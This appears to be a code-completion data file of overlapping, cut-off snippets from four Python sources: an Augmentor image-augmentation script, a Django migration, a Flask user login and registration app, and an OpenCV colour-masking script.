"min_factor=0.4, max_factor=1.6) p.random_contrast(0.5, min_factor=0.4, max_factor=1.2) if Graph: #p.rotate(probability=0.7, max_left_rotation=20, max_right_rotation=20) #p.zoom(probability=0.5, min_factor=0.8, max_factor=1.2)",
"magnitude=0.15) if Erase: p.random_erasing(1.0,rectangle_area=0.5) return p if __name__=='__main__': folder = '29xxx' p =",
"p = Augmentor.Pipeline(folder) if IP: p.random_color(0.5, min_factor=0.4, max_factor=1.6) p.random_brightness(0.5, min_factor=0.4, max_factor=1.6) p.random_contrast(0.5, min_factor=0.4,",
"p.random_contrast(0.5, min_factor=0.4, max_factor=1.2) if Graph: #p.rotate(probability=0.7, max_left_rotation=20, max_right_rotation=20) #p.zoom(probability=0.5, min_factor=0.8, max_factor=1.2) p.random_distortion(probability=0.5, grid_width=4,",
"and Graph==False and Erase==False: return None p = Augmentor.Pipeline(folder) if IP: p.random_color(0.5, min_factor=0.4,",
"min_factor=0.8, max_factor=1.2) p.random_distortion(probability=0.5, grid_width=4, grid_height=4, magnitude=4) #p.skew_left_right(probability=0.5, magnitude=0.15) if Erase: p.random_erasing(1.0,rectangle_area=0.5) return p",
"min_factor=0.4, max_factor=1.2) if Graph: #p.rotate(probability=0.7, max_left_rotation=20, max_right_rotation=20) #p.zoom(probability=0.5, min_factor=0.8, max_factor=1.2) p.random_distortion(probability=0.5, grid_width=4, grid_height=4,",
"grid_width=4, grid_height=4, magnitude=4) #p.skew_left_right(probability=0.5, magnitude=0.15) if Erase: p.random_erasing(1.0,rectangle_area=0.5) return p if __name__=='__main__': folder",
"max_factor=1.6) p.random_contrast(0.5, min_factor=0.4, max_factor=1.2) if Graph: #p.rotate(probability=0.7, max_left_rotation=20, max_right_rotation=20) #p.zoom(probability=0.5, min_factor=0.8, max_factor=1.2) p.random_distortion(probability=0.5,",
"return None p = Augmentor.Pipeline(folder) if IP: p.random_color(0.5, min_factor=0.4, max_factor=1.6) p.random_brightness(0.5, min_factor=0.4, max_factor=1.6)",
"Augmentor.Pipeline(folder) if IP: p.random_color(0.5, min_factor=0.4, max_factor=1.6) p.random_brightness(0.5, min_factor=0.4, max_factor=1.6) p.random_contrast(0.5, min_factor=0.4, max_factor=1.2) if",
"grid_height=4, magnitude=4) #p.skew_left_right(probability=0.5, magnitude=0.15) if Erase: p.random_erasing(1.0,rectangle_area=0.5) return p if __name__=='__main__': folder =",
"magnitude=4) #p.skew_left_right(probability=0.5, magnitude=0.15) if Erase: p.random_erasing(1.0,rectangle_area=0.5) return p if __name__=='__main__': folder = '29xxx'",
"if IP==False and Graph==False and Erase==False: return None p = Augmentor.Pipeline(folder) if IP:",
"max_right_rotation=20) #p.zoom(probability=0.5, min_factor=0.8, max_factor=1.2) p.random_distortion(probability=0.5, grid_width=4, grid_height=4, magnitude=4) #p.skew_left_right(probability=0.5, magnitude=0.15) if Erase: p.random_erasing(1.0,rectangle_area=0.5)",
"Erase==False: return None p = Augmentor.Pipeline(folder) if IP: p.random_color(0.5, min_factor=0.4, max_factor=1.6) p.random_brightness(0.5, min_factor=0.4,",
"Graph=False, Erase=False): if IP==False and Graph==False and Erase==False: return None p = Augmentor.Pipeline(folder)",
"def RandomAugment(folder, IP=False, Graph=False, Erase=False): if IP==False and Graph==False and Erase==False: return None"
] |
[
"django.db.models.deletion from django.conf import settings from django.db import migrations, models class Migration(migrations.Migration): dependencies",
"models class Migration(migrations.Migration): dependencies = [(\"registrations\", \"0014_auto_20180503_1418\")] operations = [ migrations.AlterField( model_name=\"registration\", name=\"created_by\",",
"class Migration(migrations.Migration): dependencies = [(\"registrations\", \"0014_auto_20180503_1418\")] operations = [ migrations.AlterField( model_name=\"registration\", name=\"created_by\", field=models.ForeignKey(",
"to=settings.AUTH_USER_MODEL, ), ), migrations.AlterField( model_name=\"registration\", name=\"updated_by\", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, related_name=\"registrations_updated\", to=settings.AUTH_USER_MODEL, ), ),",
"related_name=\"registrations_created\", to=settings.AUTH_USER_MODEL, ), ), migrations.AlterField( model_name=\"registration\", name=\"updated_by\", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, related_name=\"registrations_updated\", to=settings.AUTH_USER_MODEL, ),",
"# Generated by Django 2.1.2 on 2018-10-15 10:02 import django.db.models.deletion from django.conf import",
"settings from django.db import migrations, models class Migration(migrations.Migration): dependencies = [(\"registrations\", \"0014_auto_20180503_1418\")] operations",
"migrations, models class Migration(migrations.Migration): dependencies = [(\"registrations\", \"0014_auto_20180503_1418\")] operations = [ migrations.AlterField( model_name=\"registration\",",
"from django.conf import settings from django.db import migrations, models class Migration(migrations.Migration): dependencies =",
"import migrations, models class Migration(migrations.Migration): dependencies = [(\"registrations\", \"0014_auto_20180503_1418\")] operations = [ migrations.AlterField(",
"\"0014_auto_20180503_1418\")] operations = [ migrations.AlterField( model_name=\"registration\", name=\"created_by\", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, related_name=\"registrations_created\", to=settings.AUTH_USER_MODEL, ),",
"django.conf import settings from django.db import migrations, models class Migration(migrations.Migration): dependencies = [(\"registrations\",",
"null=True, on_delete=django.db.models.deletion.SET_NULL, related_name=\"registrations_created\", to=settings.AUTH_USER_MODEL, ), ), migrations.AlterField( model_name=\"registration\", name=\"updated_by\", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, related_name=\"registrations_updated\",",
"= [(\"registrations\", \"0014_auto_20180503_1418\")] operations = [ migrations.AlterField( model_name=\"registration\", name=\"created_by\", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, related_name=\"registrations_created\",",
"django.db import migrations, models class Migration(migrations.Migration): dependencies = [(\"registrations\", \"0014_auto_20180503_1418\")] operations = [",
"), ), migrations.AlterField( model_name=\"registration\", name=\"updated_by\", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, related_name=\"registrations_updated\", to=settings.AUTH_USER_MODEL, ), ), ]",
"Generated by Django 2.1.2 on 2018-10-15 10:02 import django.db.models.deletion from django.conf import settings",
"Migration(migrations.Migration): dependencies = [(\"registrations\", \"0014_auto_20180503_1418\")] operations = [ migrations.AlterField( model_name=\"registration\", name=\"created_by\", field=models.ForeignKey( null=True,",
"2018-10-15 10:02 import django.db.models.deletion from django.conf import settings from django.db import migrations, models",
"name=\"created_by\", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, related_name=\"registrations_created\", to=settings.AUTH_USER_MODEL, ), ), migrations.AlterField( model_name=\"registration\", name=\"updated_by\", field=models.ForeignKey( null=True,",
"migrations.AlterField( model_name=\"registration\", name=\"created_by\", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, related_name=\"registrations_created\", to=settings.AUTH_USER_MODEL, ), ), migrations.AlterField( model_name=\"registration\", name=\"updated_by\",",
"from django.db import migrations, models class Migration(migrations.Migration): dependencies = [(\"registrations\", \"0014_auto_20180503_1418\")] operations =",
"<filename>registrations/migrations/0015_auto_20181015_1002.py # Generated by Django 2.1.2 on 2018-10-15 10:02 import django.db.models.deletion from django.conf",
"2.1.2 on 2018-10-15 10:02 import django.db.models.deletion from django.conf import settings from django.db import",
"= [ migrations.AlterField( model_name=\"registration\", name=\"created_by\", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, related_name=\"registrations_created\", to=settings.AUTH_USER_MODEL, ), ), migrations.AlterField(",
"field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, related_name=\"registrations_created\", to=settings.AUTH_USER_MODEL, ), ), migrations.AlterField( model_name=\"registration\", name=\"updated_by\", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL,",
"[(\"registrations\", \"0014_auto_20180503_1418\")] operations = [ migrations.AlterField( model_name=\"registration\", name=\"created_by\", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, related_name=\"registrations_created\", to=settings.AUTH_USER_MODEL,",
"Django 2.1.2 on 2018-10-15 10:02 import django.db.models.deletion from django.conf import settings from django.db",
"import django.db.models.deletion from django.conf import settings from django.db import migrations, models class Migration(migrations.Migration):",
"10:02 import django.db.models.deletion from django.conf import settings from django.db import migrations, models class",
"model_name=\"registration\", name=\"created_by\", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, related_name=\"registrations_created\", to=settings.AUTH_USER_MODEL, ), ), migrations.AlterField( model_name=\"registration\", name=\"updated_by\", field=models.ForeignKey(",
"on 2018-10-15 10:02 import django.db.models.deletion from django.conf import settings from django.db import migrations,",
"dependencies = [(\"registrations\", \"0014_auto_20180503_1418\")] operations = [ migrations.AlterField( model_name=\"registration\", name=\"created_by\", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL,",
"on_delete=django.db.models.deletion.SET_NULL, related_name=\"registrations_created\", to=settings.AUTH_USER_MODEL, ), ), migrations.AlterField( model_name=\"registration\", name=\"updated_by\", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, related_name=\"registrations_updated\", to=settings.AUTH_USER_MODEL,",
"by Django 2.1.2 on 2018-10-15 10:02 import django.db.models.deletion from django.conf import settings from",
"operations = [ migrations.AlterField( model_name=\"registration\", name=\"created_by\", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, related_name=\"registrations_created\", to=settings.AUTH_USER_MODEL, ), ),",
"[ migrations.AlterField( model_name=\"registration\", name=\"created_by\", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, related_name=\"registrations_created\", to=settings.AUTH_USER_MODEL, ), ), migrations.AlterField( model_name=\"registration\",",
"import settings from django.db import migrations, models class Migration(migrations.Migration): dependencies = [(\"registrations\", \"0014_auto_20180503_1418\")]"
] |
[
"or not student.check_password(form.password.data): flash('Not a username or incorrect password!') return redirect(url_for('login')) login_user(student, remember=form.rememberme.data)",
"**kwargs): db.create_all() @app.route('/', methods=['GET']) @app.route('/index', methods=['GET']) def index(): return render_template('base.html') @app.route('/register', methods=['GET', 'POST'])",
"User from flask_login import current_user, login_user, logout_user, login_required @app.before_first_request def initDB(*args, **kwargs): db.create_all()",
"student.check_password(form.password.data): flash('Not a username or incorrect password!') return redirect(url_for('login')) login_user(student, remember=form.rememberme.data) return redirect(url_for('index'))",
"redirect(url_for('index')) form = LoginForm() if form.validate_on_submit(): student = User.query.filter_by(username=form.username.data).first() if student is None",
"login(): if current_user.is_authenticated: return redirect(url_for('index')) form = LoginForm() if form.validate_on_submit(): student = User.query.filter_by(username=form.username.data).first()",
"db.session.add(acc) db.session.commit() return redirect(url_for('index')) return render_template('user_registration.html', form=form) @login_required @app.route('/logout') def logout(): logout_user() return",
"firstname=form.firstname.data, lastname=form.lastname.data) acc.get_password(form.password2.data) db.session.add(acc) db.session.commit() return redirect(url_for('index')) return render_template('user_registration.html', form=form) @login_required @app.route('/logout') def",
"sqlalchemy from app.forms import RegisterForm, LoginForm from app.models import User from flask_login import",
"username or incorrect password!') return redirect(url_for('login')) login_user(student, remember=form.rememberme.data) return redirect(url_for('index')) return render_template('login.html', title='Login",
"incorrect password!') return redirect(url_for('login')) login_user(student, remember=form.rememberme.data) return redirect(url_for('index')) return render_template('login.html', title='Login Page', form=form)",
"return render_template('base.html') @app.route('/register', methods=['GET', 'POST']) def register(): form = RegisterForm() if form.validate_on_submit(): acc",
"login_required @app.before_first_request def initDB(*args, **kwargs): db.create_all() @app.route('/', methods=['GET']) @app.route('/index', methods=['GET']) def index(): return",
"if form.validate_on_submit(): acc = User(username=form.username.data, email=form.email.data, firstname=form.firstname.data, lastname=form.lastname.data) acc.get_password(form.password2.data) db.session.add(acc) db.session.commit() return redirect(url_for('index'))",
"if student is None or not student.check_password(form.password.data): flash('Not a username or incorrect password!')",
"= User.query.filter_by(username=form.username.data).first() if student is None or not student.check_password(form.password.data): flash('Not a username or",
"render_template, flash, redirect, url_for, request from app import app, db from flask_sqlalchemy import",
"import User from flask_login import current_user, login_user, logout_user, login_required @app.before_first_request def initDB(*args, **kwargs):",
"initDB(*args, **kwargs): db.create_all() @app.route('/', methods=['GET']) @app.route('/index', methods=['GET']) def index(): return render_template('base.html') @app.route('/register', methods=['GET',",
"def logout(): logout_user() return redirect(url_for('index')) @app.route('/login', methods=['GET', 'POST']) def login(): if current_user.is_authenticated: return",
"RegisterForm() if form.validate_on_submit(): acc = User(username=form.username.data, email=form.email.data, firstname=form.firstname.data, lastname=form.lastname.data) acc.get_password(form.password2.data) db.session.add(acc) db.session.commit() return",
"User.query.filter_by(username=form.username.data).first() if student is None or not student.check_password(form.password.data): flash('Not a username or incorrect",
"flask_sqlalchemy import sqlalchemy from app.forms import RegisterForm, LoginForm from app.models import User from",
"form.validate_on_submit(): student = User.query.filter_by(username=form.username.data).first() if student is None or not student.check_password(form.password.data): flash('Not a",
"form=form) @login_required @app.route('/logout') def logout(): logout_user() return redirect(url_for('index')) @app.route('/login', methods=['GET', 'POST']) def login():",
"import sqlalchemy from app.forms import RegisterForm, LoginForm from app.models import User from flask_login",
"email=form.email.data, firstname=form.firstname.data, lastname=form.lastname.data) acc.get_password(form.password2.data) db.session.add(acc) db.session.commit() return redirect(url_for('index')) return render_template('user_registration.html', form=form) @login_required @app.route('/logout')",
"app.forms import RegisterForm, LoginForm from app.models import User from flask_login import current_user, login_user,",
"logout_user() return redirect(url_for('index')) @app.route('/login', methods=['GET', 'POST']) def login(): if current_user.is_authenticated: return redirect(url_for('index')) form",
"import RegisterForm, LoginForm from app.models import User from flask_login import current_user, login_user, logout_user,",
"def register(): form = RegisterForm() if form.validate_on_submit(): acc = User(username=form.username.data, email=form.email.data, firstname=form.firstname.data, lastname=form.lastname.data)",
"@login_required @app.route('/logout') def logout(): logout_user() return redirect(url_for('index')) @app.route('/login', methods=['GET', 'POST']) def login(): if",
"'POST']) def login(): if current_user.is_authenticated: return redirect(url_for('index')) form = LoginForm() if form.validate_on_submit(): student",
"@app.route('/', methods=['GET']) @app.route('/index', methods=['GET']) def index(): return render_template('base.html') @app.route('/register', methods=['GET', 'POST']) def register():",
"from flask_login import current_user, login_user, logout_user, login_required @app.before_first_request def initDB(*args, **kwargs): db.create_all() @app.route('/',",
"redirect(url_for('index')) return render_template('user_registration.html', form=form) @login_required @app.route('/logout') def logout(): logout_user() return redirect(url_for('index')) @app.route('/login', methods=['GET',",
"student = User.query.filter_by(username=form.username.data).first() if student is None or not student.check_password(form.password.data): flash('Not a username",
"import render_template, flash, redirect, url_for, request from app import app, db from flask_sqlalchemy",
"is None or not student.check_password(form.password.data): flash('Not a username or incorrect password!') return redirect(url_for('login'))",
"LoginForm() if form.validate_on_submit(): student = User.query.filter_by(username=form.username.data).first() if student is None or not student.check_password(form.password.data):",
"@app.route('/login', methods=['GET', 'POST']) def login(): if current_user.is_authenticated: return redirect(url_for('index')) form = LoginForm() if",
"return redirect(url_for('index')) return render_template('user_registration.html', form=form) @login_required @app.route('/logout') def logout(): logout_user() return redirect(url_for('index')) @app.route('/login',",
"@app.route('/index', methods=['GET']) def index(): return render_template('base.html') @app.route('/register', methods=['GET', 'POST']) def register(): form =",
"current_user.is_authenticated: return redirect(url_for('index')) form = LoginForm() if form.validate_on_submit(): student = User.query.filter_by(username=form.username.data).first() if student",
"None or not student.check_password(form.password.data): flash('Not a username or incorrect password!') return redirect(url_for('login')) login_user(student,",
"app.models import User from flask_login import current_user, login_user, logout_user, login_required @app.before_first_request def initDB(*args,",
"flash, redirect, url_for, request from app import app, db from flask_sqlalchemy import sqlalchemy",
"db.session.commit() return redirect(url_for('index')) return render_template('user_registration.html', form=form) @login_required @app.route('/logout') def logout(): logout_user() return redirect(url_for('index'))",
"@app.before_first_request def initDB(*args, **kwargs): db.create_all() @app.route('/', methods=['GET']) @app.route('/index', methods=['GET']) def index(): return render_template('base.html')",
"db.create_all() @app.route('/', methods=['GET']) @app.route('/index', methods=['GET']) def index(): return render_template('base.html') @app.route('/register', methods=['GET', 'POST']) def",
"RegisterForm, LoginForm from app.models import User from flask_login import current_user, login_user, logout_user, login_required",
"render_template('base.html') @app.route('/register', methods=['GET', 'POST']) def register(): form = RegisterForm() if form.validate_on_submit(): acc =",
"methods=['GET']) @app.route('/index', methods=['GET']) def index(): return render_template('base.html') @app.route('/register', methods=['GET', 'POST']) def register(): form",
"= RegisterForm() if form.validate_on_submit(): acc = User(username=form.username.data, email=form.email.data, firstname=form.firstname.data, lastname=form.lastname.data) acc.get_password(form.password2.data) db.session.add(acc) db.session.commit()",
"student is None or not student.check_password(form.password.data): flash('Not a username or incorrect password!') return",
"return redirect(url_for('index')) form = LoginForm() if form.validate_on_submit(): student = User.query.filter_by(username=form.username.data).first() if student is",
"not student.check_password(form.password.data): flash('Not a username or incorrect password!') return redirect(url_for('login')) login_user(student, remember=form.rememberme.data) return",
"render_template('user_registration.html', form=form) @login_required @app.route('/logout') def logout(): logout_user() return redirect(url_for('index')) @app.route('/login', methods=['GET', 'POST']) def",
"logout_user, login_required @app.before_first_request def initDB(*args, **kwargs): db.create_all() @app.route('/', methods=['GET']) @app.route('/index', methods=['GET']) def index():",
"methods=['GET', 'POST']) def login(): if current_user.is_authenticated: return redirect(url_for('index')) form = LoginForm() if form.validate_on_submit():",
"index(): return render_template('base.html') @app.route('/register', methods=['GET', 'POST']) def register(): form = RegisterForm() if form.validate_on_submit():",
"current_user, login_user, logout_user, login_required @app.before_first_request def initDB(*args, **kwargs): db.create_all() @app.route('/', methods=['GET']) @app.route('/index', methods=['GET'])",
"def initDB(*args, **kwargs): db.create_all() @app.route('/', methods=['GET']) @app.route('/index', methods=['GET']) def index(): return render_template('base.html') @app.route('/register',",
"def login(): if current_user.is_authenticated: return redirect(url_for('index')) form = LoginForm() if form.validate_on_submit(): student =",
"url_for, request from app import app, db from flask_sqlalchemy import sqlalchemy from app.forms",
"from flask import render_template, flash, redirect, url_for, request from app import app, db",
"methods=['GET', 'POST']) def register(): form = RegisterForm() if form.validate_on_submit(): acc = User(username=form.username.data, email=form.email.data,",
"User(username=form.username.data, email=form.email.data, firstname=form.firstname.data, lastname=form.lastname.data) acc.get_password(form.password2.data) db.session.add(acc) db.session.commit() return redirect(url_for('index')) return render_template('user_registration.html', form=form) @login_required",
"if current_user.is_authenticated: return redirect(url_for('index')) form = LoginForm() if form.validate_on_submit(): student = User.query.filter_by(username=form.username.data).first() if",
"form = RegisterForm() if form.validate_on_submit(): acc = User(username=form.username.data, email=form.email.data, firstname=form.firstname.data, lastname=form.lastname.data) acc.get_password(form.password2.data) db.session.add(acc)",
"flask import render_template, flash, redirect, url_for, request from app import app, db from",
"if form.validate_on_submit(): student = User.query.filter_by(username=form.username.data).first() if student is None or not student.check_password(form.password.data): flash('Not",
"lastname=form.lastname.data) acc.get_password(form.password2.data) db.session.add(acc) db.session.commit() return redirect(url_for('index')) return render_template('user_registration.html', form=form) @login_required @app.route('/logout') def logout():",
"register(): form = RegisterForm() if form.validate_on_submit(): acc = User(username=form.username.data, email=form.email.data, firstname=form.firstname.data, lastname=form.lastname.data) acc.get_password(form.password2.data)",
"from app import app, db from flask_sqlalchemy import sqlalchemy from app.forms import RegisterForm,",
"app import app, db from flask_sqlalchemy import sqlalchemy from app.forms import RegisterForm, LoginForm",
"redirect, url_for, request from app import app, db from flask_sqlalchemy import sqlalchemy from",
"'POST']) def register(): form = RegisterForm() if form.validate_on_submit(): acc = User(username=form.username.data, email=form.email.data, firstname=form.firstname.data,",
"@app.route('/logout') def logout(): logout_user() return redirect(url_for('index')) @app.route('/login', methods=['GET', 'POST']) def login(): if current_user.is_authenticated:",
"form.validate_on_submit(): acc = User(username=form.username.data, email=form.email.data, firstname=form.firstname.data, lastname=form.lastname.data) acc.get_password(form.password2.data) db.session.add(acc) db.session.commit() return redirect(url_for('index')) return",
"redirect(url_for('index')) @app.route('/login', methods=['GET', 'POST']) def login(): if current_user.is_authenticated: return redirect(url_for('index')) form = LoginForm()",
"a username or incorrect password!') return redirect(url_for('login')) login_user(student, remember=form.rememberme.data) return redirect(url_for('index')) return render_template('login.html',",
"db from flask_sqlalchemy import sqlalchemy from app.forms import RegisterForm, LoginForm from app.models import",
"acc.get_password(form.password2.data) db.session.add(acc) db.session.commit() return redirect(url_for('index')) return render_template('user_registration.html', form=form) @login_required @app.route('/logout') def logout(): logout_user()",
"or incorrect password!') return redirect(url_for('login')) login_user(student, remember=form.rememberme.data) return redirect(url_for('index')) return render_template('login.html', title='Login Page',",
"= User(username=form.username.data, email=form.email.data, firstname=form.firstname.data, lastname=form.lastname.data) acc.get_password(form.password2.data) db.session.add(acc) db.session.commit() return redirect(url_for('index')) return render_template('user_registration.html', form=form)",
"return render_template('user_registration.html', form=form) @login_required @app.route('/logout') def logout(): logout_user() return redirect(url_for('index')) @app.route('/login', methods=['GET', 'POST'])",
"import app, db from flask_sqlalchemy import sqlalchemy from app.forms import RegisterForm, LoginForm from",
"LoginForm from app.models import User from flask_login import current_user, login_user, logout_user, login_required @app.before_first_request",
"from flask_sqlalchemy import sqlalchemy from app.forms import RegisterForm, LoginForm from app.models import User",
"form = LoginForm() if form.validate_on_submit(): student = User.query.filter_by(username=form.username.data).first() if student is None or",
"from app.forms import RegisterForm, LoginForm from app.models import User from flask_login import current_user,",
"from app.models import User from flask_login import current_user, login_user, logout_user, login_required @app.before_first_request def",
"import current_user, login_user, logout_user, login_required @app.before_first_request def initDB(*args, **kwargs): db.create_all() @app.route('/', methods=['GET']) @app.route('/index',",
"logout(): logout_user() return redirect(url_for('index')) @app.route('/login', methods=['GET', 'POST']) def login(): if current_user.is_authenticated: return redirect(url_for('index'))",
"flash('Not a username or incorrect password!') return redirect(url_for('login')) login_user(student, remember=form.rememberme.data) return redirect(url_for('index')) return",
"acc = User(username=form.username.data, email=form.email.data, firstname=form.firstname.data, lastname=form.lastname.data) acc.get_password(form.password2.data) db.session.add(acc) db.session.commit() return redirect(url_for('index')) return render_template('user_registration.html',",
"return redirect(url_for('index')) @app.route('/login', methods=['GET', 'POST']) def login(): if current_user.is_authenticated: return redirect(url_for('index')) form =",
"flask_login import current_user, login_user, logout_user, login_required @app.before_first_request def initDB(*args, **kwargs): db.create_all() @app.route('/', methods=['GET'])",
"request from app import app, db from flask_sqlalchemy import sqlalchemy from app.forms import",
"login_user, logout_user, login_required @app.before_first_request def initDB(*args, **kwargs): db.create_all() @app.route('/', methods=['GET']) @app.route('/index', methods=['GET']) def",
"def index(): return render_template('base.html') @app.route('/register', methods=['GET', 'POST']) def register(): form = RegisterForm() if",
"app, db from flask_sqlalchemy import sqlalchemy from app.forms import RegisterForm, LoginForm from app.models",
"@app.route('/register', methods=['GET', 'POST']) def register(): form = RegisterForm() if form.validate_on_submit(): acc = User(username=form.username.data,",
"= LoginForm() if form.validate_on_submit(): student = User.query.filter_by(username=form.username.data).first() if student is None or not",
"methods=['GET']) def index(): return render_template('base.html') @app.route('/register', methods=['GET', 'POST']) def register(): form = RegisterForm()"
] |
[
"np.array([0, 42, 0]) high = np.array([179, 255, 255]) mask = cv2.inRange(hsv_frame, low, high)",
"= cv2.bitwise_and(frame, frame, mask=mask) #cv2.imshow(\"Frame\", frame) #cv2.imshow(\"Red\", red) #cv2.imshow(\"Blue\", blue) cv2.imshow(\"Green\", green) cv2.imshow(\"Yellow\",",
"= np.array([40, 255, 255]) yellow_mask = cv2.inRange(hsv_frame, low_yellow, high_yellow) yellow = cv2.bitwise_and(frame, frame,",
"Blue color low_blue = np.array([94, 80, 2]) high_blue = np.array([126, 255, 255]) blue_mask",
"cv2.imshow(\"Green\", green) cv2.imshow(\"Yellow\", yellow) #cv2.imshow(\"Result\", result) key = cv2.waitKey(1) if key == 27:",
"= cap.read() hsv_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV) # Red color low_red = np.array([161, 155,",
"= np.array([25, 52, 72]) high_green = np.array([102, 255, 255]) green_mask = cv2.inRange(hsv_frame, low_green,",
"np.array([126, 255, 255]) blue_mask = cv2.inRange(hsv_frame, low_blue, high_blue) blue = cv2.bitwise_and(frame, frame, mask=blue_mask)",
"high = np.array([179, 255, 255]) mask = cv2.inRange(hsv_frame, low, high) result = cv2.bitwise_and(frame,",
"low_green = np.array([25, 52, 72]) high_green = np.array([102, 255, 255]) green_mask = cv2.inRange(hsv_frame,",
"high_green) green = cv2.bitwise_and(frame, frame, mask=green_mask) #yellow low_yellow = np.array([21, 39, 64]) high_yellow",
"Red color low_red = np.array([161, 155, 84]) high_red = np.array([179, 255, 255]) red_mask",
"red_mask = cv2.inRange(hsv_frame, low_red, high_red) red = cv2.bitwise_and(frame, frame, mask=red_mask) # Blue color",
"mask=yellow_mask) # Every color except white low = np.array([0, 42, 0]) high =",
"= cv2.bitwise_and(frame, frame, mask=blue_mask) # Green color low_green = np.array([25, 52, 72]) high_green",
"84]) high_red = np.array([179, 255, 255]) red_mask = cv2.inRange(hsv_frame, low_red, high_red) red =",
"red) #cv2.imshow(\"Blue\", blue) cv2.imshow(\"Green\", green) cv2.imshow(\"Yellow\", yellow) #cv2.imshow(\"Result\", result) key = cv2.waitKey(1) if",
"cap = cv2.VideoCapture(0) while True: _, frame = cap.read() hsv_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)",
"low_red = np.array([161, 155, 84]) high_red = np.array([179, 255, 255]) red_mask = cv2.inRange(hsv_frame,",
"color low_green = np.array([25, 52, 72]) high_green = np.array([102, 255, 255]) green_mask =",
"= np.array([179, 255, 255]) mask = cv2.inRange(hsv_frame, low, high) result = cv2.bitwise_and(frame, frame,",
"mask=red_mask) # Blue color low_blue = np.array([94, 80, 2]) high_blue = np.array([126, 255,",
"Green color low_green = np.array([25, 52, 72]) high_green = np.array([102, 255, 255]) green_mask",
"cv2.COLOR_BGR2HSV) # Red color low_red = np.array([161, 155, 84]) high_red = np.array([179, 255,",
"low = np.array([0, 42, 0]) high = np.array([179, 255, 255]) mask = cv2.inRange(hsv_frame,",
"0]) high = np.array([179, 255, 255]) mask = cv2.inRange(hsv_frame, low, high) result =",
"= np.array([161, 155, 84]) high_red = np.array([179, 255, 255]) red_mask = cv2.inRange(hsv_frame, low_red,",
"80, 2]) high_blue = np.array([126, 255, 255]) blue_mask = cv2.inRange(hsv_frame, low_blue, high_blue) blue",
"np.array([94, 80, 2]) high_blue = np.array([126, 255, 255]) blue_mask = cv2.inRange(hsv_frame, low_blue, high_blue)",
"high_red = np.array([179, 255, 255]) red_mask = cv2.inRange(hsv_frame, low_red, high_red) red = cv2.bitwise_and(frame,",
"2]) high_blue = np.array([126, 255, 255]) blue_mask = cv2.inRange(hsv_frame, low_blue, high_blue) blue =",
"red = cv2.bitwise_and(frame, frame, mask=red_mask) # Blue color low_blue = np.array([94, 80, 2])",
"np.array([102, 255, 255]) green_mask = cv2.inRange(hsv_frame, low_green, high_green) green = cv2.bitwise_and(frame, frame, mask=green_mask)",
"# Every color except white low = np.array([0, 42, 0]) high = np.array([179,",
"color low_red = np.array([161, 155, 84]) high_red = np.array([179, 255, 255]) red_mask =",
"frame, mask=blue_mask) # Green color low_green = np.array([25, 52, 72]) high_green = np.array([102,",
"cv2.cvtColor(frame, cv2.COLOR_BGR2HSV) # Red color low_red = np.array([161, 155, 84]) high_red = np.array([179,",
"np.array([179, 255, 255]) mask = cv2.inRange(hsv_frame, low, high) result = cv2.bitwise_and(frame, frame, mask=mask)",
"155, 84]) high_red = np.array([179, 255, 255]) red_mask = cv2.inRange(hsv_frame, low_red, high_red) red",
"low_yellow = np.array([21, 39, 64]) high_yellow = np.array([40, 255, 255]) yellow_mask = cv2.inRange(hsv_frame,",
"cv2.inRange(hsv_frame, low, high) result = cv2.bitwise_and(frame, frame, mask=mask) #cv2.imshow(\"Frame\", frame) #cv2.imshow(\"Red\", red) #cv2.imshow(\"Blue\",",
"# Green color low_green = np.array([25, 52, 72]) high_green = np.array([102, 255, 255])",
"color low_blue = np.array([94, 80, 2]) high_blue = np.array([126, 255, 255]) blue_mask =",
"high_blue) blue = cv2.bitwise_and(frame, frame, mask=blue_mask) # Green color low_green = np.array([25, 52,",
"np.array([179, 255, 255]) red_mask = cv2.inRange(hsv_frame, low_red, high_red) red = cv2.bitwise_and(frame, frame, mask=red_mask)",
"yellow_mask = cv2.inRange(hsv_frame, low_yellow, high_yellow) yellow = cv2.bitwise_and(frame, frame, mask=yellow_mask) # Every color",
"cap.read() hsv_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV) # Red color low_red = np.array([161, 155, 84])",
"frame, mask=yellow_mask) # Every color except white low = np.array([0, 42, 0]) high",
"= np.array([179, 255, 255]) red_mask = cv2.inRange(hsv_frame, low_red, high_red) red = cv2.bitwise_and(frame, frame,",
"cv2.inRange(hsv_frame, low_yellow, high_yellow) yellow = cv2.bitwise_and(frame, frame, mask=yellow_mask) # Every color except white",
"high_green = np.array([102, 255, 255]) green_mask = cv2.inRange(hsv_frame, low_green, high_green) green = cv2.bitwise_and(frame,",
"blue = cv2.bitwise_and(frame, frame, mask=blue_mask) # Green color low_green = np.array([25, 52, 72])",
"= cv2.inRange(hsv_frame, low, high) result = cv2.bitwise_and(frame, frame, mask=mask) #cv2.imshow(\"Frame\", frame) #cv2.imshow(\"Red\", red)",
"255]) blue_mask = cv2.inRange(hsv_frame, low_blue, high_blue) blue = cv2.bitwise_and(frame, frame, mask=blue_mask) # Green",
"Every color except white low = np.array([0, 42, 0]) high = np.array([179, 255,",
"np cap = cv2.VideoCapture(0) while True: _, frame = cap.read() hsv_frame = cv2.cvtColor(frame,",
"255, 255]) mask = cv2.inRange(hsv_frame, low, high) result = cv2.bitwise_and(frame, frame, mask=mask) #cv2.imshow(\"Frame\",",
